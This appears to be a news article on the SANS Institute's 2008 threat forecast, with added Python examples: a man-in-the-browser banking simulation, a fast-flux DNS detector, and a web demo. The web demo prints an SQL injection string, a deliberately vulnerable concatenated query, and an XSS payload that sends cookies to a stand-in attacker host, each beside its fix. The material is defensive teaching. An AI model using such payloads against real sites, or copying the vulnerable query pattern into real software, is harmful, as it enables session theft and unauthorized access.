Expect increased attacks on Web browsers, more botnets, and sophisticated cyberespionage, according to the annual SANS Institute report.
Advanced identity theft bots appear sixth on the SANS list. "A new generation of identity theft is being powered by bots that stay on machines for three to five months collecting passwords, bank account information, surfing history, frequently used e-mail addresses, and more," the SANS report said. "They'll gather enough data to enable extortion attempts (against people who surf child porn sites, for example) and advanced identity theft attempts where criminals have enough data to pass basic security checks."
A Trojan program, Trojan.Silentbanker, described on Monday in a Symantec blog post, represents one such bot. "The ability of this Trojan to perform man-in-the-middle attacks on valid transactions is what is most worrying," said Symantec researcher Liam O'Murchu. "The Trojan can intercept transactions that require two-factor authentication. It can then silently change the user-entered destination bank account details to the attacker's account details instead."
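The tampering O'Murchu describes works because a conventional one-time password proves only that the user is present, not what the user agreed to. The following simulation is an added example, not code from the article or from Symantec: a bank, a second-factor token and a browser-resident Trojan are all modelled in-process, the key and account numbers are constructed, and the bound-code scheme shown as the fix is a general transaction-signing approach the page itself does not discuss.

```python
"""Simulate a man-in-the-browser Trojan rewriting the destination account.

Scenario A: the bank checks a one-time password that is independent of the
transaction, so the altered transaction is accepted.
Scenario B: the confirmation code is an HMAC over the amount and destination
the user saw on a trusted device, so the altered transaction is rejected.
All keys and account numbers are constructed for this illustration.
"""
import hashlib
import hmac
import secrets

SHARED_KEY = b"constructed-per-user-token-key"   # assumed: provisioned to the user's token
USER_ACCOUNT = "DE00 1111 2222 3333"              # constructed
ATTACKER_ACCOUNT = "LV00 9999 8888 7777"          # constructed


def issue_plain_otp() -> str:
    """A one-time password that says nothing about the transaction it confirms."""
    return secrets.token_hex(4)


def bank_accepts_plain_otp(issued: str, submitted: str) -> bool:
    """Naive check: if the OTP matches, the bank trusts whatever the browser sent."""
    return hmac.compare_digest(issued, submitted)


def transaction_code(amount: str, destination: str) -> str:
    """Code computed on a trusted device from the details the user actually sees.
    Any change to amount or destination yields a different code."""
    msg = f"{amount}|{destination}".encode()
    return hmac.new(SHARED_KEY, msg, hashlib.sha256).hexdigest()[:8]


def bank_accepts_bound_code(submitted_code: str, tx: dict) -> bool:
    """The bank recomputes the code from the transaction it received."""
    expected = transaction_code(tx["amount"], tx["destination"])
    return hmac.compare_digest(expected, submitted_code)


def trojan_rewrites(tx: dict) -> dict:
    """Man-in-the-browser: swap the destination after the user has confirmed."""
    return {**tx, "destination": ATTACKER_ACCOUNT}


def run_plain_otp_scenario() -> tuple:
    """Returns (accepted_by_bank, destination_the_bank_saw)."""
    user_tx = {"amount": "500.00", "destination": USER_ACCOUNT}
    otp = issue_plain_otp()
    tampered = trojan_rewrites(user_tx)          # the Trojan forwards the valid OTP unchanged
    return bank_accepts_plain_otp(otp, otp), tampered["destination"]


def run_bound_code_scenario() -> tuple:
    """Returns (accepted_by_bank, destination_the_bank_saw)."""
    user_tx = {"amount": "500.00", "destination": USER_ACCOUNT}
    code = transaction_code(user_tx["amount"], user_tx["destination"])  # on the token, not in the browser
    tampered = trojan_rewrites(user_tx)
    return bank_accepts_bound_code(code, tampered), tampered["destination"]


def run_honest_bound_scenario() -> bool:
    """Sanity check: an untampered transaction with a bound code is accepted."""
    tx = {"amount": "500.00", "destination": USER_ACCOUNT}
    return bank_accepts_bound_code(transaction_code(tx["amount"], tx["destination"]), tx)


if __name__ == "__main__":
    print("plain OTP  :", run_plain_otp_scenario())
    print("bound code :", run_bound_code_scenario())
```

The bound code only helps if the amount and destination are shown to the user on something the Trojan cannot draw on (a hardware token or out-of-band channel); if the token is fed its inputs by the same compromised browser, the Trojan simply rewrites what the user is asked to confirm.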
The sophistication of Trojan.Silentbanker and other malware such as Storm and Nugache reflects the seventh-ranked item on the SANS list: the increasing maliciousness of malware. Malware is becoming not only more insidious but also more aggressive about its own self-preservation. The SANS researchers see malware increasingly taking the offensive against malware fighters and their systems. They also see it becoming stealthier, hiding its malicious nature in order to strike more effectively. The same is happening at the network level, where fast-flux DNS techniques (rapidly rotating the IP addresses behind a hostname, with very short TTLs, so that infected machines act as short-lived proxies for the real servers) are being refined to better conceal malware server infrastructure.
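Fast flux leaves a footprint in DNS that a defender can look for: very short TTLs, a different set of addresses on nearly every lookup, and addresses scattered across many unrelated networks rather than one hosting block. The heuristic below is an added example, not code from the article or from SANS; the lookups, domain names and thresholds are constructed (the addresses come from the RFC 6598 shared range so they cannot be real hosts), and /16 prefixes stand in for the ASN lookups a production detector would use.

```python
"""Heuristic fast-flux detector over repeated DNS lookups of the same name.

Signals used: minimum TTL, number of distinct A records seen over time,
number of distinct /16 prefixes those records span, and churn (the share of
answers in each lookup that were not present in the previous one).
Sample data and thresholds are constructed for this illustration.
"""
import ipaddress
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Lookup:
    domain: str
    ttl: int            # TTL of the A records in this answer, in seconds
    answers: tuple      # A records returned by this lookup


def prefix16(ip: str) -> str:
    """Collapse an IPv4 address to its /16, a cheap stand-in for AS diversity."""
    return str(ipaddress.ip_network(f"{ip}/16", strict=False))


def flux_features(lookups) -> dict:
    """Aggregate successive lookups of one domain into the fast-flux signals."""
    if not lookups:
        raise ValueError("need at least one lookup")
    all_ips, churned, compared, prev = set(), 0, 0, None
    for lk in lookups:
        cur = set(lk.answers)
        if prev is not None:
            churned += len(cur - prev)      # answers not seen in the previous lookup
            compared += len(cur)
        all_ips |= cur
        prev = cur
    return {
        "min_ttl": min(lk.ttl for lk in lookups),
        "distinct_ips": len(all_ips),
        "distinct_prefixes": len({prefix16(ip) for ip in all_ips}),
        "churn": churned / compared if compared else 0.0,
    }


def is_fast_flux(lookups, max_ttl=300, min_ips=5, min_prefixes=4, min_churn=0.5) -> bool:
    """All four signals must fire: a low TTL alone is normal for CDNs and load balancers."""
    f = flux_features(lookups)
    return (f["min_ttl"] <= max_ttl
            and f["distinct_ips"] >= min_ips
            and f["distinct_prefixes"] >= min_prefixes
            and f["churn"] >= min_churn)


# Constructed lookups: three successive queries per domain.
SAMPLE_LOOKUPS = [
    # Flux-like: TTL 60, mostly new addresses every time, spread over many /16s.
    Lookup("flux-c2.example", 60, ("100.64.1.10", "100.65.2.20", "100.66.3.30", "100.67.4.40")),
    Lookup("flux-c2.example", 60, ("100.68.5.50", "100.69.6.60", "100.66.3.30", "100.70.7.70")),
    Lookup("flux-c2.example", 60, ("100.71.8.80", "100.72.9.90", "100.73.10.100", "100.68.5.50")),
    # CDN-like: TTL 60 and rotating answers, but all inside one /16 and a small pool.
    Lookup("cdn.example", 60, ("100.100.1.1", "100.100.1.2")),
    Lookup("cdn.example", 60, ("100.100.1.3", "100.100.1.4")),
    Lookup("cdn.example", 60, ("100.100.1.1", "100.100.1.2")),
    # Static: long TTL, same single address every time.
    Lookup("www.example", 3600, ("100.90.0.1",)),
    Lookup("www.example", 3600, ("100.90.0.1",)),
    Lookup("www.example", 3600, ("100.90.0.1",)),
]


def classify(lookups=SAMPLE_LOOKUPS) -> dict:
    """Group lookups by domain and flag each one."""
    by_domain = defaultdict(list)
    for lk in lookups:
        by_domain[lk.domain].append(lk)
    return {d: is_fast_flux(lks) for d, lks in by_domain.items()}


if __name__ == "__main__":
    for domain, flagged in classify().items():
        print(f"{domain:18} fast-flux={flagged}  {flux_features([lk for lk in SAMPLE_LOOKUPS if lk.domain == domain])}")
```

Requiring all four signals is what keeps the CDN out of the alert list: it has the low TTL and the churn but neither the pool size nor the network diversity. In practice the prefix count would be replaced by an ASN lookup and the thresholds tuned against known-good traffic, and the same features can be computed for the NS records of a zone to catch double-flux, where the name servers rotate as well.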
Web application vulnerabilities, such as cross-site scripting and SQL injection attacks, rank eighth on the list. "Until 2007, few criminals attacked these vulnerable sites because other attack vectors were more likely to lead to economic or information access advantage," the SANS report said. "Increasingly, however, advances in XSS and other attacks have demonstrated that criminals looking for financial gain can exploit vulnerabilities resulting from Web programming errors as new ways of penetrating important organizations."
As if to prove the point, a massive SQL injection attack against Web sites was reported last week. And the security experts who participated in this SANS report expect more such attacks in 2008.
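The "Web programming errors" the SANS report refers to are usually this simple: user input pasted into a query or into a page. The snippet below is an added example, not code from the article, the SANS report or the attack mentioned above; it uses an in-memory SQLite table with constructed rows to show a login query built by string concatenation beside its parameterized form, and a comment renderer that forgets to escape beside one that does.

```python
"""Vulnerable and hardened forms of the two Web bugs named in the SANS list.

SQL injection: the password field closes the quoted string and appends its own
condition, so the concatenated query matches every user.
Cross-site scripting: a stored comment containing markup is reflected into the
page as HTML. Table contents and the sample comment are constructed.
"""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "hunter2")])   # constructed rows
    return conn


def login_vulnerable(conn, name: str, password: str) -> list:
    """Builds the statement from user input: whatever is typed becomes SQL."""
    sql = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, name: str, password: str) -> list:
    """Placeholders keep the input as data; the driver never parses it as SQL."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (name, password))]


# Constructed payload: closes the password literal and ORs in a true condition, giving
#   ... AND password = '' OR '1'='1'
SQLI_PASSWORD = "' OR '1'='1"


def render_comment_vulnerable(comment: str) -> str:
    """Interpolates stored text straight into markup."""
    return f"<p class=\"comment\">{comment}</p>"


def render_comment_escaped(comment: str) -> str:
    """Escapes <, >, &, quotes so the browser shows the text instead of running it."""
    return f"<p class=\"comment\">{html.escape(comment, quote=True)}</p>"


# Constructed payload for the XSS case.
XSS_COMMENT = "<script>document.location='http://attacker.invalid/?c='+document.cookie</script>"


def demo() -> dict:
    conn = make_db()
    return {
        "sqli_vulnerable": login_vulnerable(conn, "alice", SQLI_PASSWORD),
        "sqli_parameterized": login_parameterized(conn, "alice", SQLI_PASSWORD),
        "honest_login": login_parameterized(conn, "bob", "hunter2"),
        "xss_vulnerable_has_script": "<script>" in render_comment_vulnerable(XSS_COMMENT),
        "xss_escaped_has_script": "<script>" in render_comment_escaped(XSS_COMMENT),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The parameterized query returns nothing for the payload because the driver sends the quote-laden string as a bound value rather than splicing it into the statement; the escaped renderer still shows the attacker's text to readers, but as inert characters. Escaping is context-specific: `html.escape` is right for element content and quoted attributes, not for a value dropped into a JavaScript block or a URL.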
Coming in at number nine, the SANS report anticipates a rise in blended and event-based attacks. Such attacks might rely on a provocative fake headline to entice recipients to open a malicious message. Or they might combine a phishing attack with an inducement to reveal personal information over the phone. An example of such an attack is the phony Federal Trade Commission e-mail notice sent to Salesforce.com users last October, which installed malware when the message was opened.
Last, the SANS report cites the rising risk of supply chain attacks affecting consumer devices. "The widespread adoption of the USB standard combined with cheap memory and consumer demand for more computer peripherals makes this vector a simple target for a sophisticated attacker," explained Marc Sachs, executive director of government affairs for national security policy at Verizon and director of the SANS Institute's Internet Storm Center, in an e-mail last week. "Pranksters like it, too. It's a simple matter to purchase an item at Best Buy or Target, bring it home, infect it as a joke, and return it. Most large stores have a 'no questions asked' return policy within a week or two of purchase. Even worse, most stores will quickly test a returned item and, if it appears to work, will reshrink-wrap it, put a price sticker on it, and return it to the shelf."
Despite recent reports of malware-infected digital picture frames and other devices, such attacks aren't likely to match the broad impact of the Storm Trojan. Nonetheless, they're well-suited for targeted attacks, and those tend to be more damaging than less discriminating attacks.